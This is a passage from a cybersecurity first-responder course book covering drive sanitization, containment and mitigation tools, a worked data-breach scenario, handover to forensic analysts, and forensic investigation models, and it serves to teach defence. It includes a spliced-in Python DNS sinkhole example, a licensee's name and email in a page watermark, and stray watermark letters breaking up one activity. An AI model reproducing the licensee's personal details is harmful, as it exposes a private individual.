In some cases, hardening a host or isolating it from other devices won't be enough to completely eradicate a malware infection or another point of compromise. It's often extremely difficult to verify that your non-destructive removal techniques have truly scrubbed rootkits and other persistence mechanisms from a device. Situations like these may call for secure erasure through a process known as sanitization. Sanitization is the act of thoroughly and completely removing all data on a storage device so it cannot be recovered. This thoroughness is essential, as there should be no data remnants that persist on the device that could lead to continued compromise.

You can sanitize a drive at the software level using various forensic applications, or you can connect a forensic hardware device to bypass the operating system. In either case, sanitization tools typically overwrite all data on a drive with random or all-zero bits. This prevents other tools from extracting and reconstructing meaningful data from the drive, as this data has been replaced by entirely meaningless information. You can also sanitize a drive through degaussing, in which a strong magnetic force is applied so the drive loses its magnetic charge, scrambling the data and rendering it unreadable.

Note: On modern drives, degaussing may be destructive to the drive itself.

Degaussing works only on media that store data magnetically, like hard disk drives. Solid-state drives (SSDs) cannot be degaussed. You also cannot reliably write zeros to an SSD and expect it to erase the data; this is because, unlike hard drives, SSDs do not simply overwrite old data with new data. Instead, SSDs mark a page on the drive as invalid so the operating system knows not to access it; the data on the page remains until the SSD determines it needs more space and erases the data on the page. Some SSD manufacturers provide firmware utilities for securely erasing data on SSDs, but those utilities tend to only work on devices from that manufacturer.

True sanitization is destructive to the virtual data, not the storage medium itself. This enables you to reconstruct and reimage the drive after it is sanitized, using a known clean backup you created prior to the incident. However, in some cases, you may not be confident that an infection has been eradicated until the storage medium itself is destroyed. Disposing of this compromised hardware typically involves physically destroying the device through force, such as through crushing the drive or shredding it into many pieces. Degaussing techniques can also destroy a drive by removing servo control data that is written to the drive when it is manufactured. Corrupted servo control data cannot be fixed and will make it impossible for the drive to determine where to read/write data on the magnetic media.

Sanitization Through Encryption

One alternative to employing direct secure erasure methods is to encrypt the drive using full drive encryption (FDE). As long as the drive undergoes FDE before any sensitive data is put on it, and you destroy the encryption key, then you will be able to safely reuse the drive without being able to access the original plaintext data. Microsoft's BitLocker® is a common example of an FDE solution.

Devices and Tools Used in Prevention, Containment, and Mitigation

You should be familiar with the devices and tools in the following table, but you should also consider how they can be used to help you address cybersecurity incidents in addition to their normal functions.

Device/Tool: How They Can Be Used to Help Prevent/Contain/Mitigate Incidents

Firewalls: Firewalls can perform some of the most rudimentary traffic filtering processes on your network. They can use both whitelists and blacklists to block certain ports you've identified as vectors for a current attack. More advanced firewalls, like web application firewalls (WAFs), can block unwanted traffic at higher layers, offering you greater control over what type of traffic you intend to block.

IDS/IPS: An intrusion detection system/intrusion prevention system (IDS/IPS) will help ensure that sustained or persistent attacks are easier to identify and characterize. Even though you may already know you're under attack, an IDS/IPS can reveal additional targets of the attack that you may have originally ignored. It can also help you detect and stop an attack whose nature evolves throughout the duration of the attack. An ongoing DDoS attack may switch from using one source botnet controller to using another one, for instance.

Endpoint solutions: Endpoint security solutions incorporating robust anti-malware functionality can help you discover and eliminate rootkits, backdoors, and other signs of an advanced persistent threat (APT). They can also help you discover and eliminate worms that spread throughout a network, as well as many other types of malware that might be part of an incident. Endpoint solutions that incorporate data loss prevention (DLP) can help you minimize the leakage of confidential data from backdoors, side channels, or other holes in your security that attackers exploit in an incident.

Routers and switches: As previously discussed, routers can be useful in creating black holes for DoS traffic to be discarded. Many modern routers also have basic firewall functionality, meaning they can block unwanted traffic communicating over certain ports and protocols. Switches are also a common component for establishing subnets. These subnets can isolate compromised devices while still affording them a network connection.

Proxies: Web proxy servers can be used as a method of content filtering. A user must pass through the proxy to connect outside of the private network, and the proxy can block the user from being exposed to malicious traffic. On the other hand, reverse proxies can respond as an intermediary for the server that the attacker is contacting. The actual server stays hidden, while the reverse proxy server takes on any inbound malicious traffic.

Virtual machines: When it comes to mitigating a malware infection, you can isolate and analyze the malware in a virtual environment. In addition, a server infrastructure spread among many distributed VMs, as in a cloud architecture, may be able to more efficiently handle excessive traffic load and minimize downtime in a DoS attack.

Desktops: Desktops are the platform from which you'll use the incident response tools of the trade. Desktops may also temporarily host VM environments used in malware analysis and offensive/responsive security tasks (such as through Kali Linux™). Indirectly, desktops are often a major source of incident intelligence because of how essential they are to the daily work of your employees.

Servers: Server infrastructure provides load balancing and data backups during DDoS attacks and data destruction breaches. Servers are also commonly used to offload raw processing power in the event of some resource-intensive recovery or mitigation effort. Like desktops, servers are a major attack target, and can provide you with a great deal of actionable intelligence.

Mobile devices: The portability of smartphones, tablets, and other mobile devices may speed up your mitigation efforts, as they are not tied to one physical location like a desktop. Some rudimentary security tools are available for mobile OSs, so you can quickly move from one affected device to another without great effort. Communicating with other CSIRT members is also much more convenient with mobile devices.

Additional Mitigation Tactics

Some additional tactics to employ when mitigating the effects of an incident include:
• Manage and restrict access to resources and behaviors for hosts in a Windows domain through group policies. Group policies define how members of an organizational group (e.g., a department) are able to interface with computing and network resources within the organization. This usually takes the form of Active Directory Group Policy Objects (GPOs), which enable an administrator to restrict user access in an Active Directory domain to a granular level. You can also apply these policies to objects like Registry entries and file systems. This may help you contain an attack that uses these objects to assume higher levels of privilege.
• Implement network access control (NAC) policies. You can restrict how hosts access resources and services over the network—including quarantining hosts in separate virtual local area networks (VLANs) or implementing switch port blocking entirely—based on several factors, including:
  • Time-based factors to keep an entity from accessing network resources based on the time of day. For example, a resource may be accessible only during business hours so that any necessary response is more readily available.
  • Location-based factors to keep an entity from accessing network resources based on where they are physically located. For example, you may not allow GPS-enabled mobile devices to access the network if they are beyond your office's perimeter.
  • Other rule-based factors to keep an entity from accessing network resources if they do not meet the predefined standards. For example, you may disallow entities using a particular operating system from accessing network resources.
  • Role-based factors to delegate access based on the entity's function and responsibilities. For example, you may allow access to a resource only if the requesting entity is in the administrator role.
• Set up a sinkhole to reroute malicious outbound traffic from your network. Your access control lists (ACLs), whether blacklisting or whitelisting, can identify potentially malicious external domains. If a bot inside your network is attempting to contact its controller on the outside, and this malicious domain matches your ACL rules, you can set up your perimeter firewall to forge a DNS response to the bot that connects the domain to an IP address you specify. This is the sinkhole, as the malicious botnet traffic cannot escape to the outside world.
• Establish a centralized system for managing logs. Keeping log generation and collection localized to individual hosts will make it easier for an attacker to wipe the logs of a host to cover their tracks. With a centralized system, logs will be offloaded and backed up onto a secure server that may be outside the attacker's grasp.
• Configure IDS/IPS rules to take on a more active containment role, rather than just a preventive one. Once you've identified the vectors and mechanisms of an attack, alter your rules to trigger alerts based on behavior that may indicate ongoing or persistent malicious behavior. You can also adjust your rules to account for the possibility of an attacker varying their attack to circumvent your detection systems. If your rules incorporate known variations on attack types, you may be able to spot additional malicious behavior you would have otherwise missed.
• When necessary, implement compensating controls when typical mitigation efforts have failed.
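The DNS filter described earlier and the sinkhole in the list above rest on the same mechanism: a forged answer that points a blocked name at an address you control. As an added example (not the course's code), the following Python builds such a responder directly on the DNS wire format and records which internal hosts asked, which is where a sinkhole earns its keep during an incident. Zone names, client addresses and the sinkhole address are constructed; allowed queries are returned as None for forwarding to an upstream resolver that is not implemented here.

```python
"""DNS filter and sinkhole responder.

Added example, not the course's own code. It parses a DNS query in wire
format, applies a blacklist or whitelist of zones, and for a blocked name
forges an A-record answer pointing the client at a local block-page or
sinkhole address while recording which internal host asked. Names and
addresses are constructed; allowed queries come back as None, meaning
"forward upstream" (the upstream resolver is not implemented here).
"""
import struct
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple


def encode_name(name: str) -> bytes:
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(lb)]) + lb.encode("ascii") for lb in labels) + b"\x00"


def build_query(txid: int, name: str, qtype: int = 1) -> bytes:
    """Standard recursive query (used only to construct sample input)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, QDCOUNT=1
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_question(packet: bytes) -> Tuple[int, int, str, int, int, int]:
    """Return (txid, flags, qname, qtype, qclass, offset just past the question)."""
    if len(packet) < 12:
        raise ValueError("short DNS header")
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    labels, pos = [], 12
    while True:
        if pos >= len(packet):
            raise ValueError("truncated question name")
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer not allowed in a question name")
        labels.append(packet[pos:pos + length].decode("ascii").lower())
        pos += length
    if pos + 4 > len(packet):
        raise ValueError("truncated question")
    qtype, qclass = struct.unpack("!HH", packet[pos:pos + 4])
    return txid, flags, ".".join(labels), qtype, qclass, pos + 4


@dataclass
class DnsPolicy:
    mode: str          # "blacklist": drop listed zones; "whitelist": drop everything else
    zones: Set[str]    # a name matches a zone if it equals the zone or lies under it
    sinkhole_ip: str   # local block-page / sinkhole server handed out for blocked names
    hits: List[Tuple[str, str]] = field(default_factory=list)  # (client, qname) for the CSIRT

    def listed(self, name: str) -> bool:
        return any(name == z or name.endswith("." + z) for z in self.zones)

    def blocked(self, name: str) -> bool:
        return self.listed(name) if self.mode == "blacklist" else not self.listed(name)

    def handle(self, client: str, packet: bytes) -> Optional[bytes]:
        """Forged response for a blocked name; None means forward the query upstream."""
        txid, flags, qname, qtype, qclass, qend = parse_question(packet)
        if not self.blocked(qname):
            return None
        self.hits.append((client, qname))  # a sinkhole hit points at an infected or misdirected host
        rflags = 0x8000 | (flags & 0x0100) | 0x0080  # QR=1, RD copied, RA=1, RCODE=0
        question = packet[12:qend]
        if qtype != 1 or qclass != 1:
            # Not an IN A query: return an empty answer section rather than a bogus record
            return struct.pack("!HHHHHH", txid, rflags, 1, 0, 0, 0) + question
        rdata = bytes(int(octet) for octet in self.sinkhole_ip.split("."))
        # Answer RR: pointer to the name at offset 12, TYPE A, CLASS IN, TTL 60 s, RDLENGTH 4
        answer = struct.pack("!HHHIH", 0xC00C, 1, 1, 60, 4) + rdata
        return struct.pack("!HHHHHH", txid, rflags, 1, 1, 0, 0) + question + answer


def answered_ip(response: bytes) -> Optional[str]:
    """Address from a one-answer A response, or None if the answer section is empty."""
    if struct.unpack("!H", response[6:8])[0] == 0:
        return None
    qend = parse_question(response)[5]
    rdlen = struct.unpack("!H", response[qend + 10:qend + 12])[0]
    return ".".join(str(b) for b in response[qend + 12:qend + 12 + rdlen])


def demo() -> dict:
    """Blacklist mode: an ad tracker and a bot's controller are both sinkholed."""
    policy = DnsPolicy("blacklist", {"ads.example", "c2.example"}, "10.0.0.53")
    blocked = policy.handle("192.168.1.20", build_query(0x1234, "tracker.ads.example"))
    allowed = policy.handle("192.168.1.21", build_query(0x1235, "intranet.example"))
    bot = policy.handle("192.168.1.77", build_query(0x1236, "update.c2.example"))
    return {"blocked_ip": answered_ip(blocked), "allowed": allowed,
            "bot_ip": answered_ip(bot), "hits": policy.hits}
```

The hits list is the artifact to feed into containment: 192.168.1.77 asking for the controller's name is the bot the text describes, identified without letting its traffic leave the network.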

Guidelines for Mitigating Incidents

Follow these guidelines when mitigating incidents.

Mitigate Incidents

When mitigating incidents:
• Leverage IAM functionality when addressing identity-based threats.
• Incorporate a patch management system to quickly update vulnerable hosts.
• Use an MDM solution to exercise greater control over mobile devices in the organization.
• Identify physical security controls and how they may be useful in mitigating incidents.
• Harden affected systems by disabling unnecessary accounts, services, and access.
• Remove affected hosts from the wider network.
• Isolate affected apps on guest VMs.
• Incorporate blacklisting and whitelisting to control what sources of malware and traffic are blocked in your organization.
• Use DNS filtering to prevent users from accessing malicious sites.
• Incorporate black hole routing to drop malicious traffic sent to the network.
• Understand how the everyday devices in your organization can help you mitigate an incident.
• Implement access control mechanisms like NAC policies, group policies, and ACLs.
• Have a plan to implement compensating controls when typical mitigation efforts fail.


ACTIVITY 10-2
Identifying and Analyzing an Incident

Scenario

Now that you've collected preliminary information about the incident and drafted a plan of action, it's time to respond. As a lead responder in Develetech's CSIRT, you've been asked to acquire more data related to the incident and analyze that data.

Instructor note: Use the slide to summarize the incident for students. This will help them keep the details fresh in their minds. Remind students that they can consult NIST SP 800-61 if they need ideas during this activity.

1. You've already collected the logs on the affected research and development server. What else should you and your team collect that will help you understand what happened?

A: Answers will vary. The team will need to collect any network logs that list remote access events. The team discovered the remote IP address (67.240.182.117), but any additional information, like the number of connection attempts, or any past activity by this IP address, will be valuable. On a network level, the team should also identify any intrusion detection/prevention activity that generates alerts. If the affected server has any anti-malware or HIDS/HIPS running, the team should also consider any alerts from these as incident-related data. The team can also consult its SIEM solution to see if any anomalous activity was detected in its log analysis duties. At this point, the team doesn't know what, if anything, was done to the server or network. All of these tool-assisted records can help them piece together the extent of the damage. Beyond technical sources of data, others in the team should also start interviewing all relevant employees. Charles needs to describe every step that he took when he tried signing in to his account, as well as who he contacted to get that resolved, and when. The help desk employee needs to corroborate this information. Likewise, you should confiscate Pat's workstation. It may be helpful to try contacting Pat as well and explaining the situation. Any surveillance camera footage around the time of Pat's computer accessing the server should also be gathered. What's more, you should determine if anyone else was in the building before 8:00 a.m. and witnessed any unusual behavior, especially around Pat's desk.

2. Your network logs show no history of the 67.240.182.117 IP address remotely connecting to any server within your Windows Active Directory domain. The IP address only attempted to connect once to the research and development server. What, if anything, does this tell you about a potential incident?

A: Unfortunately, not much. A fact of incident analysis is that not every indicator or source of information will be relevant or even accurate. This could indicate that someone specifically used this IP address because they knew it had no history that could be traced back to them; or, it might simply mean that it was the user's first time ever accessing a remote computer in the domain from that IP address.

3. Network access logs show that the remote connection tried to log in under
Charles' account five times. The server's event logs also confirm this. After
the fifth failed attempt, the domain's account lockout policy took effect, and
Charles' account was denied access until reset by an administrator. However,
Charles denies that he tried to log in last night.
What does this suggest happened?
A: It suggests, but does not prove, that the user was simply guessing the password to Charles'

e
account. After too many failed guesses, security measures kicked in and locked the account.
Because Charles denies he tried to log in last night, it seems unlikely that Charles himself forgot

ut
his password or mistyped it over and over again. Thus, the team can reasonably conclude that
someone attempted to use Charles' account as a way to log in to the research and development
server remotely.

ib
4. The team members ask how someone could have discovered Pat's
password. Because remembering passwords is difficult, Pat admits to writing

tr
several passwords on a piece of paper and placing it in the top drawer of the

is
desk.
What does this suggest about the role of Pat's account and workstation in the

D
incident?
A: It suggests the attacker merely found the password Pat wrote down and put in the drawer, and

5.
then used that to log in to the account at Pat's workstation.

Now, the CSIRT must ascertain what damage, if any, has occurred.
or
e
What practices should the team put in place for this important phase of the
response?
at

A: Answers will vary. The team should have a baseline already in place for normal behavior on both a
network level and on the affected host. This will make detecting a deviation from the norm much
lic

easier. The team has already done some log correlations, but it also needs to go further and make
sure that it knows exactly what happened on the network and the host at specific times. A SIEM
solution can assist the team in doing this, if available. The team can also make their jobs easier by
up

filtering out irrelevant data they've collected, which often becomes apparent during the analysis
phase. Any alerts generated by IDSs at key times may also confirm the nature of a possible
attack, especially if any reconnaissance was done prior to the incident.
D

6. While analyzing collected data, a responder noted that nearly two minutes
after Pat's account was logged in to the research and development server
(7:45 a.m.), event logs show a removable storage device being attached to
ot

the workstation. The next related event was when the device was safely
ejected, at 7:50 a.m.
N

What might this suggest?


A: It could suggest that the person who logged in to Pat's workstation attempted to remove data from
o

that workstation. It could also suggest that the person loaded something onto the server.
D

Lesson 10: Responding to Cybersecurity Incidents | Topic B


Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
422 | CyberSec First Responder® (Exam CFR-410)

7. The research and development server was set up with an HIDS prior to the incident. The HIDS generated an alert at 7:44 a.m. indicating that several files were copied to a host on the network, including highly confidential images and documents related to Develetech's upcoming line of smartwatches. The connection was terminated at 7:45 a.m. There is no immediate trace of the files on the client destination.
What does this suggest?
A: It suggests that a sensitive document was quickly exfiltrated from the research and development server and moved to a different host—most likely Pat's workstation—as it was the only account signed in at the time. The document was then deleted from Pat's workstation.

8. Consider everything that you've discovered thus far.
What do you believe has happened?
A: Answers may vary, but essentially, you might say something along these lines: An attacker attempted to use Charles' account to connect remotely to the internal research and development server. The attacker failed. Later, in the early morning before most people made it in to the office, the attacker physically went to Pat's desk, discovered the password written down in a drawer, and used it to log in to the workstation and the remote server. While in the remote server, the attacker transferred sensitive product files to Pat's workstation, where the attacker then copied the file to a removable drive. The attacker deleted the file from Pat's workstation, ejected the removable drive, and left. The organization's data has been breached.

ACTIVITY 10-3
Containing, Mitigating, and Recovering from an Incident

Scenario
Now that you've identified the basics of the incident, you must contain it to stop it from bringing any more harm to your organization. You'll also need to wipe any potential lasting traces of the breach from your systems to ensure the issue is resolved. The next step will be to recover the business functions that were affected by the breach so that the organization can truly return to normal. Lastly, the CSIRT needs to conduct the post-incident task of drafting an AAR so as to help prevent such an incident from occurring in the future.

Instructor note: Use the slide to summarize the incident for students. This will help them keep the details fresh in their minds. Consider asking students if they think this incident could result in a criminal prosecution, and whether they think it will require forensic investigation.

1. What are some containment and mitigation strategies you'd perform on this incident to stop a data breach from continuing or reoccurring?
A: Answers will vary. Some devices, like Pat's workstation and the research and development server, have been collected for analysis. They should stay disconnected and isolated from the wider network in case the attacker has a backdoor communication channel into these devices. When the CSIRT is ready, they should also perform malware scans on the isolated systems to determine if any filtering needs to be applied to the wider network. If the attack was assisted by malware, the team needs to block the source of that malware using whatever method they deem to be appropriate. Both Charles and Pat should have their domain accounts disabled for now, so the attacker cannot continue to use them as vectors. Network access to other servers that hold sensitive information should also be actively monitored or completely denied, depending on how significantly this will impact business needs.

2. What likely cannot be contained by the CSIRT team as a result of this breach?
A: If the attacker was able to exfiltrate data onto a USB drive and leave the building with it, they could have distributed it in any number of ways. If the design document falls into the hands of a competitor or is uploaded to the public Internet, it will be very difficult, if not impossible, to fully contain the breach.

3. A thorough scan did not detect any malware on the affected systems. The team has concluded that the systems are free of rootkits, keyloggers, and other malicious software that would help the breach persist.
How would you recover the functionality that the research and development server provided, such as serving documents about upcoming Develetech products, as well as the functionality of Pat's workstation?
A: Answers will vary. Some may argue that, because the systems are both clean of malware, and the only point of compromise at the moment is user accounts that have been disabled, it is safe to push both computers back into production. However, without the full picture of the incident, it would be premature to say there couldn't be other points of compromise that the team doesn't yet know about. Likewise, both devices may need to be treated as evidence in an upcoming investigation, so pushing them back out rather than keeping them quarantined would hurt that investigation. Instead, it would be best to recover the latest backup copy of the research and development server, put that backup image on a different machine, and use that as the live production environment for now. The IT department can provision a temporary workstation for Pat while the normal one is quarantined.

4. When it comes to Charles' and Pat's disabled user accounts, how will you approach recovery?
A: Answers will vary. The team may decide to restore Charles' account immediately, as it appears the attacker only knew his user name, and not his password. His user name is likely common knowledge in the company or easily guessable anyway. Therefore, anyone with access to the research and development server could have been a target without having done anything necessarily wrong. On the other hand, Pat's account is compromised and it needs a password change before it can be re-enabled. However, even before that, it would be a good idea to ensure that Pat is trained on proper end-user security practices and is reacquainted with the company-specific policy regarding passwords and password storage. The human factor is one of the weakest points in the security of any organization, and writing passwords down and putting them in an unlocked drawer is certainly not an acceptable practice. Until Pat has demonstrated a willingness to comply with security policies and guidelines, the account should stay disabled.

5. The situation appears to have been mitigated, and normal business operations have been restored. A new physical machine is hosting a recent backup of the research and development server, Charles' account has been re-enabled, and Pat will be provisioned a new workstation and required to undergo security training upon returning from vacation. Now the team must draft an AAR.
What lessons have you learned from this incident, what suggestions do you have so that an incident like this is prevented in the future, and what other content should be in the report?
A: Answers will vary. The AAR should clearly outline what actions the CSIRT took in its incident handling procedures. This includes every step, from identification and analysis, to containment and eradication, and then to recovery. The report should justify the actions the team took, and, if applicable, should admit if there were more efficient and accurate ways of handling the incident. Finally, the team needs to ask itself what should change as a result of this incident. The suggestions they put forth can be: encrypt the research and development server and every other server that holds sensitive data; disable USB ports on certain at-risk hosts; mandate company-wide training for end users on best security practices; draft policies that mirror this training, especially concerning best usage of passwords and the storage of those passwords; and, if feasible, implement a DLP solution on the research and development server so that any attempted exfiltration of data will be denied.
TOPIC C
Hand Over Incident Information to a Forensic Investigation
When an incident occurs, analysts may need to perform a variety of forensic activities, such as collecting data and identifying evidence. As a first responder, there are a variety of tasks you'll need to perform during and after an incident to ensure forensic analysts will be able to do their jobs effectively.

The Duties of a Forensic Analyst
Computer forensic analysts are known by a variety of other job titles, such as forensic computer examiner, digital forensic examiner, and computer forensic detective. Forensic analysts might work for the police or a security service, a bank, a computer security service organization, or within a cybersecurity team in a large organization. They use their technology and investigative skills to recover information from computer systems, memory, and storage, possibly working in cooperation with law enforcement officials to investigate cyber crimes or extract electronic evidence related to other types of crime, or to analyze evidence (as an expert witness, for example) to help organizations or individuals defend themselves in a legal case.

Forensic analysts might be involved in investigations focusing on a wide variety of incursions or violations such as hacking; terrorism; political, industrial, or commercial espionage; employee theft of sensitive company information; online fraud; and illegal pornography. Forensic analysts may also be called upon by IT technology or security groups to assist in planning IT systems and processes to ensure that evidence will be properly handled during a cybersecurity incident.

As part of a CSIRT, the forensic analyst may play a number of roles following a security incident or in general support of cybersecurity, such as:
• Investigating and reconstructing the cause of a cybersecurity incident, which might include tasks in any or all phases of the forensic process: collection, examination, analysis, and reporting.
• Investigating whether any crimes, compliance violations, or inappropriate behavior has occurred.
• Following forensic procedures to protect evidence that may be needed if a crime has occurred.
• Determining if sensitive, protected data has been exposed.
• Contributing to and supporting processes and tools used to protect evidence and ensure compliance.
• Supporting ongoing audit processes and record maintenance.

When you understand the duties that a forensic analyst is responsible for, you will be better able to communicate and hand off your results to them.

Communication of CSIRT Outcomes to Forensic Analysts
As a CSIRT member, you may be called upon to work closely with forensic analysts following an incident. Remember your purpose as an incident responder is to return your operations to normal, whereas forensic personnel are concerned with gathering evidence to use in the possible prosecution of a crime. However, while restoring operations, you will undoubtedly take note of attacks and vulnerabilities that you identify in the process. This information may be vital to a forensic investigation, and failing to present it to the forensic team may impede their efforts.

Instructor note: Point out to students that the transition from incident response to forensic investigation is not necessarily a linear process; the actions of both teams are often intertwined.

One of the first goals of this collaboration is to actually determine if a forensic investigation is warranted. This determination should be supported by strong policy: What sort of monetary loss or theft of property should be considered actionable? Does your policy also include an evidence threshold the investigation needs to meet to be viable? You may not be the one to make this decision, but the decision may depend on your findings during an incident.
Consider the following when communicating your incident outcomes to the forensic team:
• Designate a liaison who can be the forensic team's point of contact. This contact will do all of the communicating with the forensic team. This way, your CSIRT will have a single, authoritative voice with which to communicate your results, rather than fragmented and possibly contradictory voices.
• Make sure the forensic team has a good idea of the scope of the incident. They need to know what assets were affected and what business processes were disrupted. You may not know all of this, but anything you can give the team is important.
• Detail all the individual physical and virtual assets you believe were affected by the incident. Also explain why you think each particular asset was affected.
• Detail when and how malware was quarantined to stop its spread in the network. The forensic team can use this quarantined malware as evidence.
• Describe any containment, mitigation, or recovery procedures performed on devices. If there is no one-to-one copy of a drive or other device, the forensic team may need to rely on the affected system as evidence. Being able to separate incident response actions from malicious ones will make it easier for the team to identify the relevant information.
• Explain to the forensic team the tools you used to respond to the incident. What does each one do? Can you think of any issues they may present to the evidence collection process? Using the malware example previously mentioned, what if your anti-malware solution deletes malware outright, rather than risk quarantining it?
• Give what information you can about the timing of each event in the incident. When did you first notice the incident? When did you begin your response? When did you start and finish your containment/mitigation/recovery efforts? The timings are often automatically generated through logs and other event reporting solutions, but you may need to provide some timeline information manually.

Guidelines for Handing Over Incident Information to a Forensic Investigation
Follow these guidelines when you hand over incident information to a forensic investigation.

Hand Over Incident Information to a Forensic Investigation
When handing over incident information to a forensic investigation:
• Draft an AAR that details the lessons you've learned in the wake of the incident.
• Review any existing policy that guides you in handing over results to a forensic team.
• Establish meetings with other teams, including the forensic team, to determine how to share information.
• Determine who should be the point of contact for ongoing collaboration between teams.
• Set expectations that forensic investigators may need to interview members of the CSIRT during their investigation.
• Discuss what you need from the other teams (information, equipment, etc.), and what they need from you.
• Decide whether new policies need to be generated as a result of the incident or if the existing policy needs to be altered.
• Work with the forensic team to determine what data you've collected during an incident is relevant to a potential investigation, and what is not.

ACTIVITY 10-4
Handing Over Incident Information to a Forensic Investigation

Scenario
You've concluded a breach has occurred, and you've done what you can to stop it and return operations to normal. Suspecting that Develetech will want to weigh the possibility of pursuing legal action, you and your CSIRT will prepare to hand off your results to a forensic investigation team. Sharing this information with this team accurately and efficiently will greatly assist their efforts.

Instructor note: Use this slide to summarize the incident to students. This will help them keep the details fresh in their minds.

1. How do the goals of a forensic investigator differ from those of a first responder?
A: Answers may vary, but the clearest difference is that a first responder is concerned with detecting an incident and stopping it, thus returning operations to normal; whereas a forensic investigator is focused on evidence, as well as understanding the nature of an incident to pursue punitive actions or determine that no such action should be taken.

2. Despite the differences in goals, how do the two disciplines overlap?
A: Answers may vary, but both an incident responder and a forensic investigator will need to be involved in securing and isolating assets, sharing information about the possible source and vector of an attack, and reconstructing a timeline of events surrounding and including the incident.

3. What are some of the best practices that you can employ when communicating your results to Develetech's forensic team?
A: Answers will vary. First, the CSIRT will want to designate a liaison. Although both teams can meet as a whole, this liaison will be an ongoing point of contact for the forensic team to consult with. This point of contact should be the authoritative voice of the team, able to bridge both the needs of the CSIRT and those of the forensic team. The CSIRT should also communicate the scope of the incident: every asset affected, every employee involved, and so on. This will ensure that the forensic team does not have an incomplete picture from which to draw evidence. It's also important that the CSIRT describe the techniques and tools they used to contain and mitigate the incident, as these could end up affecting the investigation.

4. What specifically do you need to give the forensic team so they have all the information they need to do their work?
A: Answers may vary, but you need to send them all the relevant event and network logs from that morning and the failed remote connection attempt from the night before; hand over custody of Pat's workstation and the research and development server, along with a list of activities the CSIRT performed on these assets; and give them the AAR that details exactly what you know so far about the incident.

Summary
In this lesson, you prepared for and effectively responded to a cybersecurity incident, including tasks you must perform to ensure that forensic analysis can be conducted effectively after the event.

Instructor note: Encourage students to use the social networking tools provided on the CHOICE Course screen to follow up with their peers after the course is completed for further discussion and resources to support continued learning.

Share a recent security incident you're familiar with and the nature of the response.
A: Answers will vary. If no one volunteers to share an incident, be prepared to provide one from your experience.

How did forensics play a role during the incident response process?
A: Answers will vary. Depending on the severity or nature of the incident, some organizations may not pursue any sort of forensic investigation. They may simply be interested in containing the situation and improving upon their security, not finding out who was responsible. This may also be the case if the culprit is easily identified. For those that did pursue an investigation, they might mention that the incident responders and forensic investigators needed to closely cooperate to ensure that both teams could do their jobs effectively. The tasks performed by both of these teams often overlap, so communication of expectations is important.

Note: Check your CHOICE Course screen for opportunities to interact with your classmates, peers, and the larger CHOICE online community about the topics covered in this course or other topics you are interested in. From the Course screen you can also access available resources for a more continuous learning experience.
11 Investigating Cybersecurity Incidents
Lesson Time: 2 hours, 40 minutes

Lesson Introduction
Following a cybersecurity incident, you may be called on to perform forensic analysis, such as collecting evidence and determining how and why the incident occurred, and who caused it.

Lesson Objectives
In this lesson, you will:
• Create a plan for performing forensic investigations after incidents occur.
• Collect and analyze electronic evidence in a secure manner to prevent tampering or compromise.
• Implement measures to follow up on an investigation.

TOPIC A
Apply a Forensic Investigation Plan
Your organization may have legal obligations when investigating a cybersecurity incident, and you will certainly have obligations to your organization and its stakeholders to get to the bottom of the incident. It's important to have a plan to ensure you handle forensics properly, effectively, and in compliance with applicable regulations.

Forensic Analyst Responsibilities
In any given day, a forensic analyst might be called upon to do the following tasks.

Task: Follow legal procedures for protecting evidence
Examples:
• Ensure all forensic investigation activity is executed according to all federal and local laws, safety regulations, and privacy standards, and in line with company policies.
• Protect evidence by filling out a chain of custody form.
• During or after an incident, secure IT systems and hardware so they cannot be tampered with.
• Train others on proper procedures for protecting evidence.

Task: Collect potential sources of evidence
Examples:
• Use various forensic methods and specialist computer programs to find, recover, and copy data that may have been hidden, encrypted, damaged, password protected, or buried within massive datasets.
• Dismantle and rebuild systems, if necessary, to recover lost data.
• Follow data trails through networks and systems to uncover links between individuals or groups.

Task: Analyze evidence
Examples:
• Analyze storage, memory, logs, and other data sources to detect information or user patterns that may be used as evidence of illegal activity.
• Analyze mobile phone records to trace devices to a particular location or to rule them out.
• Transfer evidence into a format that can be used in a trial or for other legal purposes.

Task: Communicate and produce documentation
Examples:
• Carefully document each stage of an investigation, and provide detailed reports.
• Coordinate with other forensic experts to ensure that current intelligence information is communicated and disseminated in a timely manner.
• Present technical findings to managers, law enforcement organizations, and clients.

Task: Support prosecution
Examples:
• Assist detectives and other officials in analyzing data and evaluating its relevance to the case under investigation.
• Act as a technical or expert witness in a court case.
• Provide testimony in court regarding evidence collected.

Task: Maintain technology and forensic skills
Examples:
• Stay current on cyber threats and forensic methodologies and technologies.

Forensic Investigation Models
Most digital forensic models and frameworks are merely proposed and not widely adopted as an industry standard. Many of these models and frameworks are inherited from traditional forensic procedures that have been used in criminal investigations for decades. These models are then converted to be more computer applicable, and some target even more specific contexts.
The following table lists some of the more prominent digital forensic models and their phases.

Model: Abstract Digital Forensic Model (Reith, et al., 2002)
Phases:
1. Identification
2. Preparation
3. Approach strategy
4. Preservation
5. Collection
6. Examination
7. Analysis
8. Presentation
9. Returning evidence

Model: The Enhanced Digital Investigation Process Model (Baryamureeba & Tushabe, 2004)
Phases:
1. Readiness
2. Deployment
3. Traceback
4. Dynamite
5. Review

Model: A Hierarchical, Objectives-Based Framework for the Digital Investigations Process (Beebe & Clark, 2004)
Phases:
1. Preparation
2. Incident response
3. Data collection
4. Data analysis
5. Findings presentation
6. Incident closure

Model: Systematic Digital Forensic Investigation Model (Agarwal, et al., 2011)
Phases:
1. Preparation
2. Securing the scene
3. Survey and recognition
4. Documenting the scene
5. Communication shielding
6. Evidence collection
7. Preservation
8. Examination
9. Analysis
10. Presentation
11. Result and review

Model: Generic Computer Forensic Investigation Model (Yusoff, et al., 2011)
Phases:
1. Pre-process
2. Acquisition and preservation
3. Analysis
4. Presentation
5. Post-process

Model: ACPO Good Practice Guide for Digital Evidence (Association of Chief Police Officers, 2012)
Phases:
1. The principles of digital evidence
2. Plan
3. Capture
4. Analyze
5. Present

Model: Integrated Digital Forensic Process Model (Kohn, et al., 2013)
Phases:
1. Documentation
2. Preparation
3. Incident
4. Incident response
5. Digital forensic investigation
6. Presentation

